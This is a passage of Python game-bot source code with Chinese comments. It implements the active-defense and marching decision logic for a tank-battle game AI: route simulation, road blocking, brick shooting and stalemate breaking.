如果自己正常行军将会射击,那么判断射击所摧毁的块是否为敌人进攻路线上的块 如果是,则改为移动或者停止 """ ACTIVE_DEFENSE_MIN_TRIGGER_TURNS = 2 # 前两回合结束前不要触发主动防御! def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler Tank2Player = type(player) BattleTank = type(battler) oppTank = battler.get_nearest_enemy() # 从路线距离分析确定最近敌人 oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) _allowWithdraw = ( WithdrawalDecision.ALLOW_WITHDRAWAL and not player.has_label(Label.DONT_WITHDRAW) ) status = evaluate_aggressive(battler, oppBattler, allow_withdraw=_allowWithdraw) player.set_status(status) if status == Status.DEFENSIVE: # 避免过早进入 DEFENSIVE 状态 #---------------------------- currentTurn = map_.turn if currentTurn < __class__.ACTIVE_DEFENSE_MIN_TRIGGER_TURNS and False: # 取消主动防御轮数限制? player.remove_status(Status.DEFENSIVE) player.set_status(Status.AGGRESSIVE) # 前期以侵略性为主 else: # 如果是距离为 2 #---------------- # 由于两者相对的情况在前面的 encount enemy 时会被处理,这里如果遇到这种情况 # 那么说明两者是出于不相对的对角线位置。 # _route = battler.get_route_to_enemy_by_move(oppBattler) if _route.is_not_found(): _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False) assert not _route.is_not_found(), "route not found ?" # 必定能找到路! assert _route.length > 0, "unexpected overlapping enemy" if _route.length == 2: # # 此时应该考虑自己是否正处在敌方的进攻的必经之路上 # 如果是这样,那么考虑不动,这样最保守 # 否则在合适的回合冲上去挡路 # # 判定方法是将己方坦克分别视为空白和钢墙,看对方的最短路线长度是否有明显延长 # 如果有,那么就堵路 # # 需要能够正确应对这一局的情况 5cd356e5a51e681f0e921453 # TODO: # 事实上这一局敌方不管往左还是往右,都是8步,因此这里会判定为不堵路,所以就会主动重叠 # 但是,左右两边的走法是不一样的,往左走必定会走不通,左右的8步并不等价,这里需要还需要 # 进一步的分析路线的可走性 # # TODO: # 事实上这样不一定准确,因为如果敌人前面有一个土墙,那么他可以先打掉土墙 # 然后继续前移,这样敌方就可以选择继续往前移动 # enemyAttackRoute1 = oppBattler.get_shortest_attacking_route(ignore_enemies=True, bypass_enemies=False) enemyAttackRoute2 = oppBattler.get_shortest_attacking_route(ignore_enemies=False, bypass_enemies=True) if enemyAttackRoute2.length > enemyAttackRoute1.length: # 路线增长,说明是必经之路 player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # # 虽然路线长度相同,但是路线的可走性不一定相同,这里先衡量对方当前路线的可走性 # 如果本回合我方等待,敌人向前移动,那么敌方只有在能够不向原来位置闪避的情况下 # 才算是我堵不住他的路,否则仍然视为堵路成功 5cd356e5a51e681f0e921453 # x0, y0 = oppBattler.xy # 保存原始坐标 enemyMoveAction = oppBattler.get_next_attacking_action(enemyAttackRoute1) # ssert Action.is_move(enemyMoveAction) # 应该是移动 _shouldStay = False with map_.simulate_one_action(oppBattler, enemyMoveAction): if battler.get_manhattan_distance_to(oppBattler) == 1: # 此时敌方与我相邻 _shouldStay = True # 这种情况才是真正的设为 True 否则不属于此处应当考虑的情况 for enemyDodgeAction in oppBattler.try_dodge(battler): with map_.simulate_one_action(oppBattler, enemyDodgeAction): if oppBattler.xy != (x0, y0): # 如果敌人移动后可以不向着原来的位置闪避 _shouldStay = False # 此时相当于不能堵路 break if _shouldStay: player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY # # 否则自己不处在敌方的必经之路上,考虑主动堵路 # if (not oppBattler.canShoot # 对方这回合不能射击 or (Action.is_stay(oppPlayer.get_previous_action(back=1)) and Action.is_stay(oppPlayer.get_previous_action(back=2)) ) # 或者对方等待了两个回合,视为没有危险 ): # 不宜只考虑一回合,否则可能会出现这种预判错误的情况 5cdd894dd2337e01c79e9bed for moveAction in battler.get_all_valid_move_actions(): with map_.simulate_one_action(battler, moveAction): if battler.xy in enemyAttackRoute1: # 移动后我方坦克位于敌方坦克进攻路线上 player.set_status(Status.READY_TO_BLOCK_ROAD) player.set_status(Status.ACTIVE_DEFENSIVE) return moveAction # 我方的移动后仍然不会挡敌人的路?? for moveAction in battler.get_all_valid_move_actions(middle_first=True): # 中路优先 with map_.simulate_one_action(battler, moveAction): if battler.get_manhattan_distance_to(oppBattler) == 1: # 如果移动后与敌人相邻 player.set_status(Status.READY_TO_BLOCK_ROAD) player.set_status(Status.ACTIVE_DEFENSIVE) return moveAction # 否则,就是和敌人接近的连个方向上均为不可走的! # 那么让后续的逻辑进行处理 pass ''' if ( # 可能是主动防御但是为了防止重叠而等待 ( player.has_status_in_previous_turns(Status.ACTIVE_DEFENSIVE, turns=1) and player.has_status_in_previous_turns(Status.READY_TO_BLOCK_ROAD, turns=1) and Action.is_stay(player.get_previous_action(back=1)) ) or # 可能是为了防止被杀而停止 ( player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED) and Action.is_stay(player.get_previous_action(back=1)) ) ): oppPlayer = Tank2Player(oppBattler) if Action.is_stay(oppPlayer.get_previous_action(back=1)): # 对方上回合在等待 # # 但是遇到这种情况就非常尴尬 5cd356e5a51e681f0e921453 # # 需要再判断一下是否有必要上前堵路 # _shouldMove = False x1, y1 = oppBattler.xy x2, y2 = _route[1].xy # 目标位置 enemyAttackRoute = oppBattler.get_shortest_attacking_route() if (x2, y2) in enemyAttackRoute: # 下一步移动为进攻路线 enemyMoveAction = Action.get_move_action(x1, y1, x2, y2) with map_.simulate_one_action(oppBattler, enemyMoveAction): for enemyDodgeAction in oppBattler.try_dodge(battler): # 如果敌人上前后可以闪避我 route1 = oppBattler.get_shortest_attacking_route() with map_.simulate_one_action(oppBattler, enemyDodgeAction): route2 = oppBattler.get_shortest_attacking_route() if route2.length <= route1.length: # 并且闪避的路线不是原路返回 _shouldMove = True break # # 真正的值得堵路的情况 # if _shouldMove: x1, y1 = battler.xy x2, y2 = _route[1].xy # 跳过开头 moveAction = Action.get_move_action(x1, y1, x2, y2) if map_.is_valid_move_action(battler, moveAction): # 稍微检查一下,应该本来是不会有错的 player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction # # 否则选择不要上前和敌人重叠,而是堵路 # player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return Action.STAY''' # endif # 转向寻找和敌方进攻路线相似度更高的路线 #-------------------------------------- # enemyAttackRoute = oppBattler.get_shortest_attacking_route() closestAttackRoute = max( battler.get_all_shortest_attacking_routes(delay=3), # 允许 3 步延迟 key=lambda r: estimate_route_similarity(r, enemyAttackRoute) ) # 相似度最大的路线 # # 判断下一步是否可以出现在敌人的攻击路径之上 5cd31d84a51e681f0e91ca2c #------------------------------- # 如果可以,就移动过去 # for moveAction in battler.get_all_valid_move_actions(): with map_.simulate_one_action(battler, moveAction): x3, y3 = battler.xy # 获得移动后的坐标 if (x3, y3) in enemyAttackRoute: _willMove = False # 是否符合移动的条件 realAction = player.try_make_decision(moveAction) if Action.is_move(realAction): _willMove = True elif player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1): # 打破僵局 oppBattler = player.get_risky_enemy() oppPlayer = Tank2Player(oppBattler) if (oppBattler.canShoot # 当回合可以射击 and not oppPlayer.has_status_in_previous_turns(Status.RELOADING) # 上回合也可以射击 ): # 说明敌人大概率不打算攻击我 _willMove = True # # 符合了移动的条件 # 但是还需要检查移动方向 # 不能向着远离敌人的方向移动,不然就会后退 ... 5cd33351a51e681f0e91da39 # if _willMove: distance1 = battler.get_manhattan_distance_to(oppBattler) with map_.simulate_one_action(battler, moveAction): distance2 = battler.get_manhattan_distance_to(oppBattler) if distance2 > distance1: # 向着远处移动了 pass else: # 添加一个限制,必须要移动后出现在敌人的附近 # 否则约束过弱,容易导致前期乱跑的情况 5cd39434a51e681f0e924128 # for enemy in oppBattler.get_enemies_around(): if enemy is tank: player.set_status(Status.ACTIVE_DEFENSIVE) player.set_status(Status.READY_TO_BLOCK_ROAD) return moveAction attackAction = battler.get_next_attacking_action(closestAttackRoute) realAction = player.try_make_decision(attackAction) # # 判断自己的下一步是否为敌人开路 #------------------------- # 如果自己下一个行为是射击,然后所射掉的块为敌人进攻路线上的块 # 那么将这个动作转为移动或者停止 # # TODO: # 这个动作是有条件的,通常认为是,块就处在敌人的周围,我将块打破后 # 敌人有炮,我不能马上移到块的,这样就可能让敌人过掉,在这种情况下避免开炮 # # TODO: # 不能被过掉的情况不准确!只有不再在同一直线的情况下才需要判断 5ce444a8d2337e01c7a5eaea # 如果两者处在同一条直线,假如双方都射击,那么下一回合就直接相遇,并不会出现被对方过掉的情况 # if (not battler.on_the_same_line_with(oppBattler) and Action.is_shoot(realAction) and battler.will_destroy_a_brick_if_shoot(realAction) # 下一步将会打掉一个墙 ): field = battler.get_destroyed_fields_if_shoot(realAction)[0] enemyAttackRoute = oppBattler.get_shortest_attacking_route() if enemyAttackRoute.has_block(field): # 打掉的 Brick 在敌人进攻路线上 # # 再尝试模拟,是否会导致上述情况 # _dontShoot = False with outer_label() as OUTER_BREAK: for enemyMoveAction in oppBattler.get_all_valid_actions(): # 一回合假设我方射击,敌人任意行为 with map_.simulate_multi_actions((battler, realAction), (oppBattler, enemyMoveAction)): moveAction = realAction - 4 # 二回合假设我方移动,敌人射击 for enemyShootAction in oppBattler.get_all_valid_shoot_actions(): # 自动判断是否可射击 with map_.simulate_multi_actions((battler, moveAction), (oppBattler, enemyShootAction)): if battler.destroyed: # 然后这回合我方坦克挂了 _dontShoot = True raise OUTER_BREAK if _dontShoot: player.set_status(Status.ACTIVE_DEFENSIVE) return player.try_make_decision(moveAction) # 移动/停止 # 否则直接采用主动防御的进攻策略 # # TODO: # 这是个糟糕的设计,因为这相当于要和下方的进攻代码重复一遍 # if battler.is_in_our_site(): # 只有在我方地盘的时候才触发 # # 首先实现禁止随便破墙 # if Action.is_shoot(realAction): # # 敌人处在墙后的水平路线上,并且与墙的间隔不超过 1 个空格 5cd33a06a51e681f0e91de95 # 事实上 1 个空格是不够的! 5cd35e08a51e681f0e92182e # enemy = battler.get_enemy_behind_brick(realAction, interval=-1) if enemy is not None: player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) player.set_status(Status.ACTIVE_DEFENSIVE) return Action.STAY # # 敌人下一步可能移到墙后面 # for moveAction in oppBattler.get_all_valid_move_actions(): with map_.simulate_one_action(oppBattler, moveAction): if battler.get_enemy_behind_brick(realAction, interval=-1) is not None: # 此时如果直接出现在墙的后面 player.set_status(Status.ACTIVE_DEFENSIVE) return Action.STAY if Action.is_stay(realAction): # (inserted) 主动打破僵局:因为遇到敌人,为了防止被射杀而停留 # 注: # 这段代码复制自下方的侵略模式 #-------------------------- if Action.is_move(attackAction): if player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1): # 即将停留第二回合 oppPlayer = Tank2Player(oppBattler) if (Action.is_move(oppPlayer.get_previous_action(back=1)) and battler.get_manhattan_distance_to(oppBattler) == 2 ): # 这种情况对应着对方刚刚到达拐角处,这种情况是有危险性的,因此再停留一回合 5cd4045c86d50d05a00840e1 pass elif oppBattler.canShoot: # 当回合可以射击,并且我上回合停留,因此敌人上回合可以射击 # 说明敌人大概率不打算攻击我 player.set_status(Status.ACTIVE_DEFENSIVE) return attackAction player.set_status(Status.PREVENT_BEING_KILLED) # 否则标记为防止被杀,用于上面的触发 player.set_status(Status.ACTIVE_DEFENSIVE) return realAction #{ END 'decision/single/active_defense.py' }# #{ BEGIN 'decision/single/marching.py' }# class MarchingDecision(SingleDecisionMaker): """ 行军策略 ------------------------- 当身边没有和任何敌人正面遭遇的时候,尝试寻找最佳的进攻行为 1. 进攻 2. 不会主动破墙 3. 遇到僵局,会在指定回合后自动打破僵局 4. 遇到有风险的路径导致需要停止不前的,会考虑寻找相同长度但是安全的路径,并改变方向 5. ...... """ def _make_decision(self): player = self._player signal = self._signal map_ = player._map tank = player.tank battler = player.battler teammate = player.teammate Tank2Player = type(player) BattleTank = type(battler) # (inserted) 强攻信号 #------------------------- if signal == Signal.FORCED_MARCH: attackAction = battler.get_next_attacking_action() # 应该是移动行为,且不需检查安全性 player.set_status(Status.READY_TO_FORCED_MARCH) return ( attackAction, Signal.READY_TO_FORCED_MARCH ) oppTank = battler.get_nearest_enemy() oppBattler = BattleTank(oppTank) oppPlayer = Tank2Player(oppBattler) myRoute = battler.get_shortest_attacking_route() oppRoute = oppBattler.get_shortest_attacking_route() # assert not myRoute.is_not_found() and not oppRoute.is_not_found(), "route not found" # 一定能找到路 if myRoute.is_not_found() or oppRoute.is_not_found(): # 可能出现这种队友堵住去路的及其特殊的情况! 5cdde41fd2337e01c79f1284 allowedDelay = 0 else: leadingLength = oppRoute.length - myRoute.length if leadingLength <= 0: allowedDelay = 0 # 不必别人领先的情况下,就不要 delay 了 ... else: allowedDelay = leadingLength # 允许和对手同时到达,但由于我方先手,实际上应该是领先的 # # 在我方地盘时,优先从边路攻击 # 到达敌方场地,优先从中路攻击 # # 5cde18e7d2337e01c79f47c8 # isMiddleFirst = False # isMiddleFirst = battler.is_in_enemy_site() # # TODO: # 不要采用中路优先的搜索,否则容易打出狭路,然后因为敌人对自己存在威胁而停止不前! # 5ce48c2fd2337e01c7a6459b isXAxisFirst = False # # 如果我方两架坦克都到达了敌方基地,处于双方均不回头的局面 5cec9157641dd10fdcc5f30d # 那么可以采用 x-axis-first 以更好地触发团队合作,因为它优先选择拆除 x = 4 的墙 # _allPlayers = [ player, teammate, *player.opponents ] if (all( _player.battler.is_in_enemy_site(include_midline=True) for _player in _allPlayers ) and all( not _player.battler.has_enemy_around() for _player in _allPlayers ) ): # 如果双方都处在对方基地,并且都没有遭遇到敌人 isMiddleFirst = True # 想要使用 x-axis-first 必须首先 middle-first isXAxisFirst = True if battler.is_in_our_site(): # # 在我方基地的时候,不要评估敌人对攻击路线的干扰,而是优先采用边路优先的搜索。这样可能和敌人相撞, # 但至少可以平局。如果在我方基地就开始衡量敌人的干扰,那么敌人绕边路的时候我方可能会选择中路, # 这种情况下可能会被另一边的敌人干扰,出现一牵二的局面。 # # 还可能遇到一种很糟糕的情况,就是我方为了绕开敌人而选择了一条比最短路线要长的路,这种情况下 # 可能我方最终就会落后与对方,这样如果还绕过了敌人,那就根本没法拦截了,到最后肯定是输。 # # TODO: # ---------------------- # 这个影响对于bot的侵略性影响非常大,因为很容易因此和对方平局。并且边路分拆难以触发合作拆家, # 进攻优势会被削弱。也许可以一牵二的情况进行特判,其他情况继续绕路? # 也许需要根据情况进行判定,毕竟一牵二的情况和绕路拆家结果反而赢了的情况是有的,而且似乎都不少见 # routes = battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst) else: routes = sorted( battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst), key=lambda r: estimate_enemy_effect_on_route(r, player) ) route = None # 这回合的进攻路线 returnAction = Action.STAY # 将会返回的行为,默认为 STAY # # 对于最优方案的缓存,用于判断次优行为是否合理 # 没事老回头实在是太蠢了! 5cee6790641dd10fdcc8de2c # 有路也不是这样走啊! # _firstAttackAction = None # 第一条路线给出的进攻行为 _firstRealAction = None # 第一条路线下玩家真实决策的而行为 _firstPreventBeingKilled = False # 第一个进攻行为是否因为受到敌人拦截而受阻 _firstStatus = None # 缓存第一次决策时的状态 _isFirstRoute = False # 当前是否为第一条路径 _firstRoute = None # 缓存第一条路径 with outer_label() as OUTER_BREAK: # # TODO: # 仅仅在此处综合考虑路线长度和敌人的影响,有必要统一让所有尝试获得下一步行为的函数都 # 以于此处相同的方式获得下一攻击行为 # # for route in battler.get_all_shortest_attacking_routes(): # 目的是找到一个不是停留的动作,避免浪费时间 # for route in sorted_routes_by_enemy_effect( # battler.get_all_shortest_attacking_routes(delay=allowedDelay), player ): # for route in sorted( battler.get_all_shortest_attacking_routes(delay=allowedDelay, middle_first=isMiddleFirst, x_axis_first=isXAxisFirst), # key=lambda r: estimate_enemy_effect_on_route(r, player) ): _cachedAttackActions = set() # 缓存已经考虑过的结果 for _idx, route in enumerate(routes): # 引入 idx 用于判断是第几个路线 # 首先清除可能出现的状态,也就是导致 stay 的状况 ????? _isFirstRoute = ( _idx == 0 ) if _idx == 1: # 恰好过了第二回合 _firstStatus = player.get_status().copy() # 确保所有 continue 语句设置的 status 都可以在这里被捕获 player.remove_status(Status.WAIT_FOR_MARCHING, Status.PREVENT_BEING_KILLED, Status.HAS_ENEMY_BEHIND_BRICK) attackAction = battler.get_next_attacking_action(route) if _isFirstRoute: # 缓存行为和路线 _firstAttackAction = attackAction _firstRoute = route if attackAction in _cachedAttackActions: # 缓存攻击行为,避免重复判断 continue _cachedAttackActions.add(attackAction) if Action.is_stay(attackAction): # 下一步是停留,就没必要过多判断了 returnAction = attackAction raise OUTER_BREAK realAction = player.try_make_decision(attackAction) if _isFirstRoute: # 缓存真实判断 _firstRealAction = realAction # debug_print(player, attackAction, realAction) if Action.is_stay(realAction): # 存在风险 if Action.is_move(attackAction): # 特殊情况,如果下下回合就要打掉对方基地 # 那就没必要乱跑了 5cddde4dd2337e01c79f0ba3 # if battler.is_face_to_enemy_base(): returnAction = realAction raise OUTER_BREAK # (inserted) 主动打破僵局:因为遇到敌人,为了防止被射杀而停留 # 注: # 在上方的主动防御模式里还有一段和这里逻辑基本一致的代码 #-------------------------- if (player.has_status_in_previous_turns(Status.WAIT_FOR_MARCHING, turns=1) and player.has_status_in_previous_turns(Status.PREVENT_BEING_KILLED, turns=1) ): # 即将停留第二回合 riskyBattler = player.get_risky_enemy() riskyPlayer = Tank2Player(riskyBattler) # # 判断敌人不会攻击我的标准 # # 1. 敌人当前回合可以射击 # 2。 敌人上回合也可以射击 # 3. 敌人上回合与上上回合的行为相同,也就是已经连续移动了两个回合或者等待了两个回合 # 这个补充条件非常重要 5cde71a4d2337e01c79f9a77 # # TODO: # 这个条件仍然不对!! 5ce220add2337e01c7a38462 # if (riskyBattler.canShoot # 当回合可以射击 and not riskyPlayer.has_status_in_previous_turns(Status.RELOADING) # 上回合也可以射击 and riskyPlayer.get_previous_action(back=1) == riskyPlayer.get_previous_action(back=2) ): # 说明敌人大概率不打算攻击我 if (Action.is_move(riskyPlayer.get_previous_action(back=1)) and battler.get_manhattan_distance_to(riskyBattler) == 2 ): # 这种情况对应着对方刚刚到达拐角处,这种情况是有危险性的,因此再停留一回合 5cd4045c86d50d05a00840e1 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.PREVENT_BEING_KILLED) pass else: # TODO: # 此处需要检查是否应该预先破墙 5ce21ba2d2337e01c7a37dbd # player.set_status(Status.KEEP_ON_MARCHING) returnAction = attackAction raise OUTER_BREAK # 原本的移动,现在变为停留 #------------------------ # 停着就是在浪费时间,不如选择进攻 # fields = battler.get_destroyed_fields_if_shoot(attackAction) # # 如果当前回合射击可以摧毁的对象中,包含自己最短路线上的块 # 那么就射击 # for field in fields: if route.has_block(field): # 为 block 对象,该回合可以射击 action = player.try_make_decision(battler.shoot_to(field)) if Action.is_shoot(action): # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.PREVENT_BEING_KILLED) returnAction = action raise OUTER_BREAK # # 如果能摧毁的是基地外墙,仍然选择攻击 # 因为在攻击后可能可以给出更加短的路线 # for field in fields: if battler.check_is_outer_wall_of_enemy_base(field): action = player.try_make_decision(battler.shoot_to(field)) if Action.is_shoot(action): # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.PREVENT_BEING_KILLED) returnAction = action raise OUTER_BREAK # # 如果不能摧毁和地方基地周围的墙,但是可以摧毁与自己中间相差一格的墙,那么仍然选择攻击 # 这种情况多半属于,如果当前回合往前走一步,可能被垂直方向的敌人射杀,因为不敢前进 # 在多回合后,我方可能会主动突破这种僵持情况。在我方主动向前一步的时候,敌人将可以 # 射击我方坦克。如果前方有一个空位,那么我方坦克就可以闪避到前方的空位上,从而继续前进。 # 如果这个位置本来是个砖块,但是没有预先摧毁,我方坦克在突击后就只能选择原路闪回, # 那么就可能出现僵局 # 因此这里预先摧毁和自己相差一格的土墙,方便后续突击 # # 如果是防御状态,那么不要随便打破墙壁! 5cd31d84a51e681f0e91ca2c # if (not player.has_status(Status.DEFENSIVE) # 防御性无效 and battler.is_in_enemy_site() # 只有在对方基地的时候才有效 ): for field in fields: if (isinstance(field, BrickField) and battler.get_manhattan_distance_to(field) == 2 # 距离为 2 相当于土墙 and battler.canShoot ): # 这个信号是他现在的真实体现,可以用来触发团队破墙信号 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.PREVENT_BEING_KILLED) player.set_status(Status.READY_TO_CLEAR_A_ROAD_FIRST) returnAction = battler.shoot_to(field) raise OUTER_BREAK elif Action.is_shoot(attackAction): # 如果为射击行为,检查是否是墙后敌人造成的 enemy = battler.get_enemy_behind_brick(attackAction, interval=-1) if enemy is not None: player.set_risky_enemy(enemy) # 额外指定一下,确保是这个敌人造成的 player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) # # 强攻行为,如果出现这种情况,双方均在拆家,但是对方坦克下一步有可能移到我方坦克后方 # 对于这种情况,大部分人应该选择继续进攻,同时绕开麻烦,因为进攻的时候还考虑击杀敌人 # 一般会延误战机。这种情况下应该判定为敌方坦克不会来尝试击杀我方坦克,那么就继续攻击 # 5ce57074d2337e01c7a7b128 # oppBattler = player.get_risky_enemy() if (battler.is_in_enemy_site() # 双方均在对方基地方时才触发 and oppBattler.is_in_enemy_site() ): # # 现在尝试看对方是否能够找到一条不受到我方坦克影响的最短攻击路线 # 通常应该是可以找到的 # _consideredActions = set() # 缓存已经考虑过的行为 for route in oppBattler.get_all_shortest_attacking_routes(): _action = oppBattler.get_next_attacking_action() if _action in _consideredActions: continue _consideredActions.add(_action) with map_.simulate_one_action(oppBattler, _action): if not battler.has_enemy_around(): # 说明找到了一条可以躲开我方坦克的路线 player.set_status(Status.KEEP_ON_MARCHING) returnAction = attackAction raise OUTER_BREAK # # 否则停止不前 # 此时必定有 riskyEnemy # player.set_status(Status.WAIT_FOR_MARCHING) # 可能触发 Signal.PREPARE_FOR_BREAK_BRICK 和 Signal.FORCED_MARCH player.set_status(Status.PREVENT_BEING_KILLED) # TODO: 这个状态是普适性的,希望在上面的各种情况中都能补全 if _isFirstRoute: _firstPreventBeingKilled = True # 缓存状态,仅仅在因为防止被杀而停留的状态下缓存,其他情况不算 _firstStatus = player.get_status().copy() # 结束时常规地要复制一次,避免没有第二条路的情况 returnAction = Action.STAY continue # 停留动作,尝试继续寻找 # 对于移动行为,有可能处于闪避到远路又回来的僵局中 5cd009e0a51e681f0e8f3ffb # 因此在这里根据前期状态尝试打破僵局 #---------------------------------- if (player.has_status_in_previous_turns(Status.WILL_DODGE_TO_LONG_WAY, turns=1) # 说明上回合刚闪避回来 and Action.is_move(realAction) # 然后这回合又准备回去 ): # TODO: # 此处是否有必要进一步检查两次遇到的敌人为同一人? # # # 首先考虑前方相距一格处是否有土墙,如果有,那么就凿墙 5cd009e0a51e681f0e8f3ffb # if battler.will_destroy_a_brick_if_shoot(realAction): field = battler.get_destroyed_fields_if_shoot(realAction)[0] if (not battler.is_in_our_site(field) # 这个 brick 必须不在我方基地! and battler.get_manhattan_distance_to(field) == 2 and battler.canShoot ): player.set_status(Status.KEEP_ON_MARCHING) # 真实体现 returnAction = battler.shoot_to(field) raise OUTER_BREAK #player.add_label(Label.ALWAYS_DODGE_TO_LONG_WAY) # 如果能够运行到这里,就添加这个标记 # 预判一步,如果下一步会遇到敌人,并且不得不回头闪避的话,就考虑先摧毁与自己中间相差一格的墙(如果存在) # 类似于主动防御的情况 # if Action.is_move(realAction): if battler.is_face_to_enemy_base(ignore_brick=True): # 如果已经和基地处在同一直线上 with map_.simulate_one_action(battler, realAction): if not battler.is_face_to_enemy_base(ignore_brick=True): returnAction = Action.STAY # 如果移动后不再面对敌人基地,那么就不移动 raise OUTER_BREAK if (not player.has_status(Status.DEFENSIVE) # 防御性无效 and battler.is_in_enemy_site() # 只有在敌方地盘时才有效! and battler.will_destroy_a_brick_if_shoot(realAction) # 如果下回合能射掉一个墙 ): _needToBreakWallFirst = True with map_.simulate_one_action(battler, realAction): enemies = battler.get_enemies_around() if len(enemies) == 0: # 没有敌人根本不需要预判 _needToBreakWallFirst = False else: with outer_label() as OUTER_BREAK_2: route1 = battler.get_shortest_attacking_route() for enemy in battler.get_enemies_around(): for action in battler.try_dodge(enemy): with map_.simulate_one_action(battler, action): route2 = battler.get_shortest_attacking_route() # 只有 route1 为 delay = 0 的选择才可比较 if route2.length <= route1.length: # 如果存在着一种闪避方法使得闪避后线路长度可以不超过原线路长度 _needToBreakWallFirst = False # 那么就不破墙 raise OUTER_BREAK_2 if _needToBreakWallFirst: # 现在尝试破墙 shootAction = realAction + 4 for field in battler.get_destroyed_fields_if_shoot(shootAction): if isinstance(field, BrickField): if battler.get_manhattan_distance_to(field) == 2: # 距离为 2 的土墙 if battler.canShoot: player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.READY_TO_CLEAR_A_ROAD_FIRST) returnAction = shootAction # 不检查安全性 raise OUTER_BREAK if (_needToBreakWallFirst and not battler.canShoot # 需要射击但是暂时没有炮弹,那么就等待 ): player.set_status(Status.WAIT_FOR_MARCHING) returnAction = Action.STAY continue # # 考虑这样一种情况,如果下回合我可以射击且对方可以射击,我们中间差两个墙,如果我方不射击 # 对方可能就会压制过来,这样就很亏,所以当双方都有炮且两者间差一个墙的时候,我方优先射击 # 5cea974dd2337e01c7add31f # if (( player.has_status(Status.AGGRESSIVE) or player.has_status(Status.STALEMENT) ) and Action.is_move(realAction) and battler.canShoot ): shootAction = realAction + 4 _hasEnemyBehindTwoBricks = False oppBattler = None destroyedFields = battler.get_destroyed_fields_if_shoot(shootAction) if (len(destroyedFields) == 1 and isinstance(destroyedFields[0], BrickField) # 前方是墙 and battler.get_enemy_behind_brick(shootAction, interval=-1) is None # 现在墙后无人 ): with map_.simulate_one_action(battler, shootAction): destroyedFields = battler.get_destroyed_fields_if_shoot(shootAction) if len(destroyedFields) == 1 and isinstance(destroyedFields[0], BrickField): # 现在前面还有墙 enemy = battler.get_enemy_behind_brick(shootAction, interval=-1) if enemy is not None: # 此时墙后有人 _hasEnemyBehindTwoBricks = True oppBattler = BattleTank(enemy) if _hasEnemyBehindTwoBricks: if oppBattler.canShoot: # 此时对方也可以射击 player.set_status(Status.KEEP_ON_MARCHING) returnAction = shootAction # 那么我方这回合优先开炮,避免随后和对方进入僵持阶段 raise OUTER_BREAK # # move action 在这之前必须要全部处理完! # # # 侵略模式下优先射击,如果能够打掉处在最短路线上的墙壁 #------------------- if (player.has_status(Status.AGGRESSIVE) and Action.is_move(realAction) and battler.canShoot ): shootAction = realAction + 4 for field in battler.get_destroyed_fields_if_shoot(shootAction): if isinstance(field, BrickField) and field.xy in route: # 能够打掉一个处于最短路线上的土墙 action = player.try_make_decision(shootAction) if Action.is_shoot(action): player.set_status(Status.KEEP_ON_MARCHING) realAction = shootAction # 注意:这里修改了 realAction 方便后续判断,但是这是非常不好的一个做法 break # # 禁止随便破墙!容易导致自己陷入被动! # if Action.is_shoot(realAction): # # 敌人处在墙后的水平路线上,并且与墙的间隔不超过 1 个空格 5cd33a06a51e681f0e91de95 # 事实上 1 个空格是不够的! 5cd35e08a51e681f0e92182e # _shouldStay = False oppBattler = None enemy = battler.get_enemy_behind_brick(realAction, interval=-1) if enemy is not None: # 墙后有人,不能射击 # 否则就等待 #--------------- player.set_risky_enemy(enemy) # 设置这个敌人! player.set_status(Status.HAS_ENEMY_BEHIND_BRICK) player.set_status(Status.WAIT_FOR_MARCHING) _shouldStay = True # # 敌人下一步可能移到墙后面 # if not _shouldStay: with outer_label() as OUTER_BREAK_2: for oppBattler in [ _oppPlayer.battler for _oppPlayer in player.opponents ]: if oppBattler.destroyed: continue for moveAction in oppBattler.get_all_valid_move_actions(): with map_.simulate_one_action(oppBattler, moveAction): enemy = battler.get_enemy_behind_brick(realAction, interval=-1) if enemy is not None: # 此时如果直接出现在墙的后面 player.set_status(Status.WAIT_FOR_MARCHING) player.set_status(Status.ENEMY_MAY_APPEAR_BEHIND_BRICK) player.set_risky_enemy(enemy) # 仍然将其设置为墙后敌人 _shouldStay = True raise OUTER_BREAK_2 # # 并不是一定不能破墙,需要检查敌人是否真的有威胁 # # 1. 和队友相遇的敌人可以忽略 5ce209c1d2337e01c7a36a0a # 2. 和队友隔墙僵持的敌人可以忽略(这种情况非常有可能) 5ce5678ed2337e01c7a79ace # 3. 对手正在和队友僵持的敌人可以忽略 5ce70df6d2337e01c7a98926 # 4. 如果对手威胁我的位置他曾经到过,那么可以忽略 5ce266a1d2337e01c7a3cc90 # if _shouldStay and oppBattler is not None: teammateBattler = teammate.battler oppTank = oppBattler.tank # 考虑两人相对 for enemy in teammateBattler.get_enemies_around(): if enemy is oppTank: # 被队友牵制的敌人可以忽略 _shouldStay = False break # 考虑是否隔墙僵持 _action = teammateBattler.get_next_attacking_action() if not Action.is_stay(_action): enemy = teammateBattler.get_enemy_behind_brick(_action, interval=-1) if enemy is oppTank: # 和队友隔墙僵持的敌人可以忽略 _shouldStay = False # 考虑是否和队友僵持 if teammateBattler.get_manhattan_distance_to(oppBattler) == 2: _action = oppBattler.get_next_attacking_action() with map_.simulate_one_action(oppBattler, _action): # 模拟一步后和队友相遇 if teammateBattler.get_manhattan_distance_to(oppBattler) == 1: 